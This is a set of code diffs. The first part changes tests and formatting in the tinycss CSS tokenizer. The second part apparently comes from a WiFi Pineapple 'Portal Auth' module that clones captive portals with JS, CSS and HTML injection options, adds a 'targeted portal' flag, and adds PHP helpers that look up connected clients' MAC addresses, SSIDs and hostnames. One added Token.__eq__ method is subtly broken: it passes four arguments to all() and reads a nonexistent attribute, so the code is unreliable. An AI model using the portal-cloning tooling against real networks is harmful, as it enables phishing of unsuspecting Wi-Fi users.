:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import pytest
from tinycss.fonts3 import CSSFonts3Parser
from . import assert_errors
from .test_tokenizer import jsonify
@pytest.mark.parametrize(('css', 'expected_family_names', 'expected_errors'), [
    ('@font-feature-values foo {}', ('foo',), []),
    ('@font-feature-values Foo Test {}', ('Foo Test',), []),
    ('@font-feature-values \'Foo Test\' {}', ('Foo Test',), []),
    ('@font-feature-values Foo Test, Foo Lol, "Foo tooo"', (
        'Foo Test', 'Foo Lol', 'Foo tooo'), []),
    ('@font-feature-values Foo , Foo lol {}', ('Foo', 'Foo lol'), []),
    ('@font-feature-values Foo , "Foobar" , Lol {}', (
        'Foo', 'Foobar', 'Lol'), []),
    # Invalid selectors: the rule is dropped and an error is reported.
    ('@font-feature-values Foo, {}', None, [
        'invalid @font-feature-values selector']),
    ('@font-feature-values ,Foo {}', None, [
        'invalid @font-feature-values selector']),
    ('@font-feature-values Test,"Foo", {}', None, [
        'invalid @font-feature-values selector']),
    ('@font-feature-values Test "Foo" {}', None, [
        'invalid @font-feature-values selector']),
    ('@font-feature-values Test Foo, Test "bar", "foo" {}', None, [
        'invalid @font-feature-values selector']),
    ('@font-feature-values Test/Foo {}', None, [
        'invalid @font-feature-values selector']),
    ('@font-feature-values /Foo {}', None, [
        'invalid @font-feature-values selector']),
    ('@font-feature-values #Foo {}', None, [
        'invalid @font-feature-values selector']),
    # TODO: this currently works but should not work
    # ('@font-feature-values test@foo {}', None, [
    #     'invalid @font-feature-values selector']),
    ('@font-feature-values Hawaii 5-0 {}', None, [
        'invalid @font-feature-values selector']),
])
def test_font_feature_values_selectors(css, expected_family_names,
                                       expected_errors):
    """Family-name parsing in @font-feature-values rule headers."""
    stylesheet = CSSFonts3Parser().parse_stylesheet(css)
    assert_errors(stylesheet.errors, expected_errors)
    # When parsing succeeded, exactly one rule with the expected names.
    if stylesheet.rules:
        assert len(stylesheet.rules) == 1
        rule = stylesheet.rules[0]
        assert rule.at_keyword == '@font-feature-values'
        assert rule.family_names == expected_family_names
@pytest.mark.parametrize(('css', 'expected_declarations', 'expected_errors'), [
    ('@font-face {}', [], []),
    # @font-face takes no selector; a header token is an error.
    ('@font-face test { src: "lol"; font-family: "bar" }', None, [
        'unexpected IDENT token in @font-face rule header']),
    ('@font-face { src: "lol"; font-family: "bar" }', [
        ('src', [('STRING', 'lol')]),
        ('font-family', [('STRING', 'bar')])], []),
    # Duplicate property names are kept as-is, in source order.
    ('@font-face { src: "lol"; font-family: "bar"; src: "baz" }', [
        ('src', [('STRING', 'lol')]),
        ('font-family', [('STRING', 'bar')]),
        ('src', [('STRING', 'baz')])], []),
])
def test_font_face_content(css, expected_declarations, expected_errors):
    """Declaration parsing inside @font-face rule bodies."""
    stylesheet = CSSFonts3Parser().parse_stylesheet(css)
    assert_errors(stylesheet.errors, expected_errors)

    # Flatten a rule's declarations to comparable (name, tokens) pairs.
    def declarations(rule):
        return [(decl.name, list(jsonify(decl.value)))
                for decl in rule.declarations]

    if expected_declarations is None:
        # Invalid rules are dropped entirely; an error must be present.
        assert stylesheet.rules == []
        assert expected_errors
    else:
        assert len(stylesheet.rules) == 1
        rule = stylesheet.rules[0]
        assert rule.at_keyword == '@font-face'
        assert declarations(rule) == expected_declarations
@pytest.mark.parametrize(
    ('css', 'expected_rules', 'expected_errors'), [
        # Feature at-rules are invalid at the top level of a stylesheet.
        ('''@annotation{}''', None, [
            '@annotation rule not allowed in stylesheet']),
        ('''@font-feature-values foo {}''', None, []),
        ('''@font-feature-values foo {
            @swash { ornate: 1; }
            @styleset { double-W: 14; sharp-terminals: 16 1; }
        }''', [
            ('@swash', [('ornate', [('INTEGER', 1)])]),
            ('@styleset', [
                ('double-w', [('INTEGER', 14)]),
                ('sharp-terminals', [
                    ('INTEGER', 16), ('S', ' '), ('INTEGER', 1)])])], []),
        # Unknown nested at-rules are reported and skipped.
        ('''@font-feature-values foo {
            @swash { ornate: 14; }
            @unknown { test: 1; }
        }''', [('@swash', [('ornate', [('INTEGER', 14)])])], [
            'unknown at-rule in @font-feature-values context: @unknown']),
        # Error recovery: bad declarations are dropped, parsing continues.
        ('''@font-feature-values foo {
            @annotation{boxed:1}
            bad: 2;
            @brokenstylesetbecauseofbadabove { sharp: 1}
            @styleset { sharp-terminals: 16 1; @bad {}}
            @styleset { @bad {} top-ignored: 3; top: 9000}
            really-bad
        }''', [
            ('@annotation', [('boxed', [('INTEGER', 1)])]),
            ('@styleset', [
                ('sharp-terminals', [
                    ('INTEGER', 16), ('S', ' '), ('INTEGER', 1)])]),
            ('@styleset', [('top', [('INTEGER', 9000)])])], [
            'unexpected ; token in selector',
            'expected a property name, got ATKEYWORD',
            'expected a property name, got ATKEYWORD',
            'no declaration block found for ruleset']),
    ])
def test_font_feature_values_content(css, expected_rules, expected_errors):
    """Nested feature at-rules inside @font-feature-values bodies."""
    stylesheet = CSSFonts3Parser().parse_stylesheet(css)
    assert_errors(stylesheet.errors, expected_errors)
    if expected_rules is not None:
        assert len(stylesheet.rules) == 1
        rule = stylesheet.rules[0]
        assert rule.at_keyword == '@font-feature-values'
        # Flatten nested rules to (keyword, [(name, tokens), ...]) pairs.
        rules = [
            (at_rule.at_keyword, [
                (decl.name, list(jsonify(decl.value)))
                for decl in at_rule.declarations])
            for at_rule in rule.at_rules] if rule.at_rules else None
        assert rules == expected_rules

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
Tests for the Paged Media 3 parser
----------------------------------
@ -11,11 +11,10 @@
from __future__ import unicode_literals
import pytest
from tinycss.css21 import CSS21Parser
from tinycss.page3 import CSSPage3Parser
from .test_tokenizer import jsonify
from . import assert_errors
from .test_tokenizer import jsonify
@pytest.mark.parametrize(('css', 'expected_selector',
@ -57,7 +56,7 @@ def test_selectors(css, expected_selector, expected_specificity,
@pytest.mark.parametrize(('css', 'expected_declarations',
'expected_rules','expected_errors'), [
'expected_rules', 'expected_errors'), [
('@page {}', [], [], []),
('@page { foo: 4; bar: z }',
[('foo', [('INTEGER', 4)]), ('bar', [('IDENT', 'z')])], [], []),
@ -69,7 +68,7 @@ def test_selectors(css, expected_selector, expected_specificity,
[('foo', [('INTEGER', 4)]), ('bar', [('IDENT', 'z')])],
[('@top-center', [('content', [('STRING', 'Awesome Title')])]),
('@bottom-left', [('content', [
('FUNCTION', 'counter', [('IDENT', 'page')])])])],
('FUNCTION', 'counter', [('IDENT', 'page')])])])],
[]),
('''@page { foo: 4;
@bottom-top { content: counter(page) }
@ -100,21 +99,3 @@ def test_content(css, expected_declarations, expected_rules, expected_errors):
rules = [(margin_rule.at_keyword, declarations(margin_rule))
for margin_rule in rule.at_rules]
assert rules == expected_rules
def test_in_at_media():
css = '@media print { @page { size: A4 } }'
stylesheet = CSS21Parser().parse_stylesheet(css)
assert_errors(stylesheet.errors, ['@page rule not allowed in @media'])
at_media_rule, = stylesheet.rules
assert at_media_rule.at_keyword == '@media'
assert at_media_rule.rules == []
stylesheet = CSSPage3Parser().parse_stylesheet(css)
assert stylesheet.errors == []
at_media_rule, = stylesheet.rules
at_page_rule, = at_media_rule.rules
assert at_media_rule.at_keyword == '@media'
assert at_page_rule.at_keyword == '@page'
assert len(at_page_rule.declarations) == 1

View File

@ -0,0 +1,302 @@
# coding: utf-8
"""
Tests for the tokenizer
-----------------------
:copyright: (c) 2012 by Simon Sapin.
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import os
import sys
import pytest
from tinycss.tokenizer import (
cython_tokenize_flat, python_tokenize_flat, regroup)
def test_speedups():
    """Fail loudly if the Cython speedups are missing but were expected.

    Skipped (by returning early) on PyPy, or when the user explicitly
    opted out via the TINYCSS_SKIP_SPEEDUPS_TESTS environment variable.
    """
    running_on_pypy = hasattr(sys, 'pypy_translation_info')
    skip_requested = os.environ.get('TINYCSS_SKIP_SPEEDUPS_TESTS')
    if running_on_pypy or skip_requested:  # pragma: no cover
        return
    assert cython_tokenize_flat is not None, (
        'Cython speedups are not installed, related tests will '
        'be skipped. Set the TINYCSS_SKIP_SPEEDUPS_TESTS environment '
        'variable if this is expected.')
# Each test case is run against both the pure-Python and the Cython
# tokenizer; expected tokens are (type, value) or (type, value, unit).
@pytest.mark.parametrize(('tokenize', 'css_source', 'expected_tokens'), [
    (tokenize,) + test_data
    for tokenize in (python_tokenize_flat, cython_tokenize_flat)
    for test_data in [
        ('', []),
        ('red -->', [('IDENT', 'red'), ('S', ' '), ('CDC', '-->')]),
        # Longest match rule: no CDC
        ('red-->', [('IDENT', 'red--'), ('DELIM', '>')]),
        (r'p[example="foo(int x) { this.x = x;}"]', [
            ('IDENT', 'p'),
            ('[', '['),
            ('IDENT', 'example'),
            ('DELIM', '='),
            ('STRING', 'foo(int x) { this.x = x;}'),
            (']', ']')]),
        # Numbers are parsed
        ('42 .5 -4pX 1.25em 30%', [
            ('INTEGER', 42), ('S', ' '),
            ('NUMBER', .5), ('S', ' '),
            # units are normalized to lower-case:
            ('DIMENSION', -4, 'px'), ('S', ' '),
            ('DIMENSION', 1.25, 'em'), ('S', ' '),
            ('PERCENTAGE', 30, '%')]),
        # URLs are extracted
        ('url(foo.png)', [('URI', 'foo.png')]),
        ('url("foo.png")', [('URI', 'foo.png')]),
        # Escaping
        (r'/* Comment with a \ backslash */', [
            ('COMMENT', '/* Comment with a \ backslash */')]),  # Unchanged
        # backslash followed by a newline in a string: ignored
        ('"Lorem\\\nIpsum"', [('STRING', 'LoremIpsum')]),
        # backslash followed by a newline outside a string: stands for itself
        ('Lorem\\\nIpsum', [
            ('IDENT', 'Lorem'), ('DELIM', '\\'),
            ('S', '\n'), ('IDENT', 'Ipsum')]),
        # Cancel the meaning of special characters
        (r'"Lore\m Ipsum"', [('STRING', 'Lorem Ipsum')]),  # or not special
        (r'"Lorem \49psum"', [('STRING', 'Lorem Ipsum')]),
        (r'"Lorem \49 psum"', [('STRING', 'Lorem Ipsum')]),
        (r'"Lorem\"Ipsum"', [('STRING', 'Lorem"Ipsum')]),
        (r'"Lorem\\Ipsum"', [('STRING', r'Lorem\Ipsum')]),
        (r'"Lorem\5c Ipsum"', [('STRING', r'Lorem\Ipsum')]),
        (r'Lorem\+Ipsum', [('IDENT', 'Lorem+Ipsum')]),
        (r'Lorem+Ipsum', [
            ('IDENT', 'Lorem'), ('DELIM', '+'), ('IDENT', 'Ipsum')]),
        (r'url(foo\).png)', [('URI', 'foo).png')]),
        # Unicode and backslash escaping
        ('\\26 B', [('IDENT', '&B')]),
        ('\\&B', [('IDENT', '&B')]),
        ('@\\26\tB', [('ATKEYWORD', '@&B')]),
        ('@\\&B', [('ATKEYWORD', '@&B')]),
        ('#\\26\nB', [('HASH', '#&B')]),
        ('#\\&B', [('HASH', '#&B')]),
        ('\\26\r\nB(', [('FUNCTION', '&B(')]),
        ('\\&B(', [('FUNCTION', '&B(')]),
        (r'12.5\000026B', [('DIMENSION', 12.5, '&b')]),
        (r'12.5\0000263B', [('DIMENSION', 12.5, '&3b')]),  # max 6 digits
        (r'12.5\&B', [('DIMENSION', 12.5, '&b')]),
        (r'"\26 B"', [('STRING', '&B')]),
        (r"'\000026B'", [('STRING', '&B')]),
        (r'"\&B"', [('STRING', '&B')]),
        (r'url("\26 B")', [('URI', '&B')]),
        (r'url(\26 B)', [('URI', '&B')]),
        (r'url("\&B")', [('URI', '&B')]),
        (r'url(\&B)', [('URI', '&B')]),
        (r'Lorem\110000Ipsum', [('IDENT', 'Lorem\uFFFDIpsum')]),
        # Bad strings
        # String ends at EOF without closing: no error, parsed
        ('"Lorem\\26Ipsum', [('STRING', 'Lorem&Ipsum')]),
        # Unescaped newline: ends the string, error, unparsed
        ('"Lorem\\26Ipsum\n', [
            ('BAD_STRING', r'"Lorem\26Ipsum'), ('S', '\n')]),
        # Tokenization restarts after the newline, so the second " starts
        # a new string (which ends at EOF without errors, as above.)
        ('"Lorem\\26Ipsum\ndolor" sit', [
            ('BAD_STRING', r'"Lorem\26Ipsum'), ('S', '\n'),
            ('IDENT', 'dolor'), ('STRING', ' sit')]),
    ]])
def test_tokens(tokenize, css_source, expected_tokens):
    """Flat tokenization yields the expected (type, value[, unit]) tuples."""
    if tokenize is None:  # pragma: no cover
        pytest.skip('Speedups not available')
    sources = [css_source]
    if sys.version_info[0] < 3:
        # On Python 2.x, ASCII-only bytestrings can be used
        # where Unicode is expected.
        sources.append(css_source.encode('ascii'))
    for css_source in sources:
        tokens = tokenize(css_source, ignore_comments=False)
        result = [
            (token.type, token.value) + (
                () if token.unit is None else (token.unit,))
            for token in tokens
        ]
        assert result == expected_tokens
@pytest.mark.parametrize('tokenize', [
    python_tokenize_flat, cython_tokenize_flat])
def test_positions(tokenize):
    """Check the line/column bookkeeping of each tokenizer.

    The source mixes '\\n' and '\\f' line endings plus a tab, so the
    reported positions exercise every newline/column code path.
    """
    if tokenize is None:  # pragma: no cover
        pytest.skip('Speedups not available')
    source = ('/* Lorem\nipsum */\fa {\n'
              '    color: red;\tcontent: "dolor\\\fsit" }')
    positions = [
        (token.type, token.line, token.column)
        for token in tokenize(source, ignore_comments=False)]
    assert positions == [
        ('COMMENT', 1, 1), ('S', 2, 9),
        ('IDENT', 3, 1), ('S', 3, 2), ('{', 3, 3),
        ('S', 3, 4), ('IDENT', 4, 5), (':', 4, 10),
        ('S', 4, 11), ('IDENT', 4, 12), (';', 4, 15), ('S', 4, 16),
        ('IDENT', 4, 17), (':', 4, 24), ('S', 4, 25), ('STRING', 4, 26),
        ('S', 5, 5), ('}', 5, 6)]
# Expected trees use the jsonify() shape: containers are (type, children),
# flat tokens are (type, value).
@pytest.mark.parametrize(('tokenize', 'css_source', 'expected_tokens'), [
    (tokenize,) + test_data
    for tokenize in (python_tokenize_flat, cython_tokenize_flat)
    for test_data in [
        ('', []),
        (r'Lorem\26 "i\psum"4px', [
            ('IDENT', 'Lorem&'), ('STRING', 'ipsum'), ('DIMENSION', 4)]),
        ('not([[lorem]]{ipsum (42)})', [
            ('FUNCTION', 'not', [
                ('[', [
                    ('[', [
                        ('IDENT', 'lorem'),
                    ]),
                ]),
                ('{', [
                    ('IDENT', 'ipsum'),
                    ('S', ' '),
                    ('(', [
                        ('INTEGER', 42),
                    ])
                ])
            ])]),
        # Close everything at EOF, no error
        ('a[b{"d', [
            ('IDENT', 'a'),
            ('[', [
                ('IDENT', 'b'),
                ('{', [
                    ('STRING', 'd'),
                ]),
            ]),
        ]),
        # Any remaining ), ] or } token is a nesting error
        ('a[b{d]e}', [
            ('IDENT', 'a'),
            ('[', [
                ('IDENT', 'b'),
                ('{', [
                    ('IDENT', 'd'),
                    (']', ']'),  # The error is visible here
                    ('IDENT', 'e'),
                ]),
            ]),
        ]),
        # ref: same tokens properly nested (compare with the error case above)
        ('a[b{d}e]', [
            ('IDENT', 'a'),
            ('[', [
                ('IDENT', 'b'),
                ('{', [
                    ('IDENT', 'd'),
                ]),
                ('IDENT', 'e'),
            ]),
        ]),
    ]])
def test_token_grouping(tokenize, css_source, expected_tokens):
    """regroup() nests flat tokens inside matching (), [] and {} pairs."""
    if tokenize is None:  # pragma: no cover
        pytest.skip('Speedups not available')
    tokens = regroup(tokenize(css_source, ignore_comments=False))
    result = list(jsonify(tokens))
    assert result == expected_tokens
def jsonify(tokens):
    """Recursively turn tokens into "JSON-compatible" data structures.

    Yields one tuple per token: ``(type, function_name, children)`` for
    FUNCTION tokens, ``(type, children)`` for other container tokens,
    and ``(type, value)`` for flat tokens.
    """
    for tok in tokens:
        kind = tok.type
        if kind == 'FUNCTION':
            yield (kind, tok.function_name, list(jsonify(tok.content)))
        elif tok.is_container:
            yield kind, list(jsonify(tok.content))
        else:
            yield kind, tok.value
@pytest.mark.parametrize(('tokenize', 'ignore_comments', 'expected_tokens'), [
    (tokenize,) + test_data
    for tokenize in (python_tokenize_flat, cython_tokenize_flat)
    for test_data in [
        # Comments kept, including the unterminated one at EOF.
        (False, [
            ('COMMENT', '/* lorem */'),
            ('S', ' '),
            ('IDENT', 'ipsum'),
            ('[', [('IDENT', 'dolor'), ('COMMENT', '/* sit */')]),
            ('BAD_COMMENT', '/* amet'),
        ]),
        # Comments (and the bad comment) dropped entirely.
        (True, [
            ('S', ' '),
            ('IDENT', 'ipsum'),
            ('[', [('IDENT', 'dolor')]),
        ]),
    ]])
def test_comments(tokenize, ignore_comments, expected_tokens):
    """Comments are kept or dropped according to ``ignore_comments``."""
    if tokenize is None:  # pragma: no cover
        pytest.skip('Speedups not available')
    source = '/* lorem */ ipsum[dolor/* sit */]/* amet'
    grouped = regroup(tokenize(source, ignore_comments))
    assert list(jsonify(grouped)) == expected_tokens
@pytest.mark.parametrize(('tokenize', 'css_source'), [
    (tokenize, test_data)
    for tokenize in (python_tokenize_flat, cython_tokenize_flat)
    for test_data in [
        r'p[example="foo(int x) { this.x = x;}"]',
        '"Lorem\\26Ipsum\ndolor" sit',
        '/* Lorem\nipsum */\fa {\n    color: red;\tcontent: "dolor\\\fsit" }',
        'not([[lorem]]{ipsum (42)})',
        'a[b{d]e}',
        'a[b{"d',
    ]])
def test_token_serialize_css(tokenize, css_source):
    """as_css() round-trips the source, both flat and regrouped."""
    if tokenize is None:  # pragma: no cover
        pytest.skip('Speedups not available')
    # Try the regrouped token tree first, then the flat token stream.
    for transform in (regroup, lambda tokens: tokens):
        stream = transform(tokenize(css_source, ignore_comments=False))
        serialized = ''.join(tok.as_css() for tok in stream)
        assert serialized == css_source
@pytest.mark.parametrize(('tokenize', 'css_source'), [
    (tokenize, test_data)
    for tokenize in (python_tokenize_flat, cython_tokenize_flat)
    for test_data in [
        '(8, foo, [z])', '[8, foo, (z)]', '{8, foo, [z]}', 'func(8, foo, [z])'
    ]
])
def test_token_api(tokenize, css_source):
    """Each source regroups to a single container with seven children."""
    if tokenize is None:  # pragma: no cover
        pytest.skip('Speedups not available')
    grouped = list(regroup(tokenize(css_source)))
    assert len(grouped) == 1
    # 2 spaces + 2 commas + 3 value tokens = 7 children.
    assert len(grouped[0].content) == 7

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.token_data
------------------
@ -11,12 +11,11 @@
from __future__ import unicode_literals
import re
import sys
import operator
import functools
import operator
import re
import string
import sys
# * Raw strings with the r'' notation are used so that \ do not need
# to be escaped.
@ -206,7 +205,7 @@ NEWLINE_UNESCAPE = functools.partial(
'')
SIMPLE_UNESCAPE = functools.partial(
re.compile(r'\\(%s)' % COMPILED_MACROS['simple_escape'] , re.I).sub,
re.compile(r'\\(%s)' % COMPILED_MACROS['simple_escape'], re.I).sub,
# Same as r'\1', but faster on CPython
operator.methodcaller('group', 1))
@ -329,6 +328,18 @@ class Token(object):
return ('<Token {0.type} at {0.line}:{0.column} {0.value!r}{1}>'
.format(self, self.unit or ''))
def __eq__(self, other):
if type(self) != type(other):
raise TypeError(
'Cannot compare {0} and {1}'.format(type(self), type(other)))
else:
return all(
self.type_ == other.type_,
self._as_css == other._as_css,
self.value == other.value,
self.unit == other.unit,
)
class ContainerToken(object):
"""A token that contains other (nested) tokens.

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.tokenizer
-----------------
@ -17,20 +17,20 @@ from __future__ import unicode_literals
from . import token_data
def tokenize_flat(css_source, ignore_comments=True,
# Make these local variable to avoid global lookups in the loop
tokens_dispatch=token_data.TOKEN_DISPATCH,
unicode_unescape=token_data.UNICODE_UNESCAPE,
newline_unescape=token_data.NEWLINE_UNESCAPE,
simple_unescape=token_data.SIMPLE_UNESCAPE,
find_newlines=token_data.FIND_NEWLINES,
Token=token_data.Token,
len=len,
int=int,
float=float,
list=list,
_None=None,
):
def tokenize_flat(
css_source, ignore_comments=True,
# Make these local variable to avoid global lookups in the loop
tokens_dispatch=token_data.TOKEN_DISPATCH,
unicode_unescape=token_data.UNICODE_UNESCAPE,
newline_unescape=token_data.NEWLINE_UNESCAPE,
simple_unescape=token_data.SIMPLE_UNESCAPE,
find_newlines=token_data.FIND_NEWLINES,
Token=token_data.Token,
len=len,
int=int,
float=float,
list=list,
_None=None):
"""
:param css_source:
CSS as an unicode string
@ -158,10 +158,9 @@ def regroup(tokens):
tokens = iter(tokens)
eof = [False]
def _regroup_inner(stop_at=None,
tokens=tokens, pairs=pairs, eof=eof,
ContainerToken=token_data.ContainerToken,
FunctionToken=token_data.FunctionToken):
def _regroup_inner(stop_at=None, tokens=tokens, pairs=pairs, eof=eof,
ContainerToken=token_data.ContainerToken,
FunctionToken=token_data.FunctionToken):
for token in tokens:
type_ = token.type
if type_ == stop_at:

View File

@ -0,0 +1 @@
VERSION = '0.4'

View File

@ -1 +0,0 @@
VERSION = '0.3'

View File

@ -16,10 +16,11 @@ parser.add_argument('--stripjs', action='store_true', dest='stripjs', help='Stri
parser.add_argument('--stripcss', action='store_true', dest='stripcss', help='Strip inline CSS from the cloned portal', required=False)
parser.add_argument('--striplinks', action='store_true', dest='striplinks', help='Strip links from the cloned portal', required=False)
parser.add_argument('--stripforms', action='store_true', dest='stripforms', help='Strip form elements from the cloned portal', required=False)
parser.add_argument('--targeted', action='store_true', dest='targeted', help='Clone to a targeted portal', required=False)
args = parser.parse_args()
cloner = PortalCloner(args.portalName, args.portalArchive, args.injectionSet)
cloner = PortalCloner(args.portalName, args.portalArchive, args.injectionSet, args.targeted)
cloner.fetchPage(args.url)
cloner.cloneResources()

View File

@ -2,25 +2,33 @@
class MyPortal extends Portal
{
public function handleAuthorization()
{
// handle form input or other extra things there
public function handleAuthorization()
{
// Call parent to handle basic authorization first
parent::handleAuthorization();
// Call parent to handle basic authorization first
parent::handleAuthorization();
// Check for other form data here
}
}
public function showSuccess()
{
// Calls default success message
//parent::showSuccess();
parent::redirect();
}
/**
* Override this to do something when the client is successfully authorized.
* By default it just notifies the Web UI.
*/
public function onSuccess()
{
// Calls default success message
parent::onSuccess();
}
public function showError()
{
// Calls default error message
parent::showError();
}
/**
* If an error occurs then do something here.
* Override to provide your own functionality.
*/
public function showError()
{
// Calls default error message
parent::showError();
}
}

View File

@ -0,0 +1,45 @@
<?php
/**
 * getClientMac
 * Looks up a client's MAC address in the DHCP lease table by IP address.
 *
 * @param string $clientIP The client's IP address
 * @return string The MAC address, or an empty string if no lease matches
 */
function getClientMac($clientIP)
{
    // Lease lines are "<expiry> <mac> <ip> <hostname> <client-id>"; field 2 is the MAC.
    $cmd = "grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'";
    return trim(exec($cmd));
}
/**
 * getClientSSID
 * Gets the SSID a client is associated with, looked up by IP address.
 *
 * @param string $clientIP The client's IP address
 * @return string The SSID, or an empty string if it cannot be determined
 */
function getClientSSID($clientIP)
{
    // The PineAP log is keyed by MAC address, so resolve the IP first.
    $mac = getClientMac($clientIP);
    if ($mac === '') {
        // No DHCP lease for this IP: bail out instead of grepping with an
        // empty pattern (which would misinterpret the log path as the pattern).
        return '';
    }

    // The directory holding pineap.log is configurable; read its location.
    // NOTE: the stored path is assumed to end with '/' (it is concatenated
    // directly with the file name, as before).
    $pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));

    // Shell-escape every interpolated value (consistent with getClientMac)
    // so a crafted lease or config entry cannot inject shell commands.
    return trim(exec("grep " . escapeshellarg($mac) . " " . escapeshellarg($pineAPLogPath . "pineap.log") . " | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
 * getClientHostName
 * Looks up a connected client's host name in the DHCP lease table by IP.
 *
 * @param string $clientIP The client's IP address
 * @return string The host name, or an empty string if no lease matches
 */
function getClientHostName($clientIP)
{
    // Field 4 of a dnsmasq lease line is the client-reported host name.
    $cmd = "grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'";
    return trim(exec($cmd));
}

View File

@ -50,6 +50,7 @@ registerController('PortalAuthController', ['$api', '$scope', '$sce', '$interval
$scope.cloner_injectJS = true;
$scope.cloner_injectCSS = true;
$scope.cloner_injectHTML = true;
$scope.cloner_targetedPortal = false;
// PASS elements
$scope.passStatus = "Disabled";
@ -502,6 +503,7 @@ registerController('PortalAuthController', ['$api', '$scope', '$sce', '$interval
clonerOpts += $scope.cloner_injectJS ? "injectjs;" : "";
clonerOpts += $scope.cloner_injectCSS ? "injectcss;" : "";
clonerOpts += $scope.cloner_injectHTML ? "injecthtml;" : "";
clonerOpts += $scope.cloner_targetedPortal ? "targeted;" : "";
clonerOpts = clonerOpts.slice(0,-1);
$api.request({
@ -538,6 +540,7 @@ registerController('PortalAuthController', ['$api', '$scope', '$sce', '$interval
$scope.cloner_injectJS = true;
$scope.cloner_injectCSS = true;
$scope.cloner_injectHTML = true;
$scope.cloner_targetedPortal = false;
});
$scope.swapDiv = (function(div){
if (div == "pass") {
@ -741,7 +744,7 @@ registerController('PortalAuthController', ['$api', '$scope', '$sce', '$interval
// Init functions
$scope.init();
$scope.depends("-check");
$scope.isOnline();
//$scope.isOnline();
$scope.checkTestServerConfig();
$scope.checkPortalExists();
$scope.getConfigs();

View File

@ -228,6 +228,11 @@ $(document).on('mouseenter', '.pa_hoverDanger', function() {
<input type="checkbox" ng-model="cloner_stripForms"><strong>Strip Forms</strong>
</label>
</div>
<div class="col-md-6">
<label class="checkbox-inline">
<input type="checkbox" ng-model="cloner_targetedPortal"><strong>Targeted Portal</strong>
</label>
</div>
</div>
<div class="col-md-12" style="margin-top: 20px; text-align: center">
<button class="btn btn-success btn-block" ng-click="clonePortal();">Clone Portal</button>

View File

@ -6,5 +6,5 @@
"tetra"
],
"title": "Portal Auth",
"version": "1.6"
"version": "1.7"
}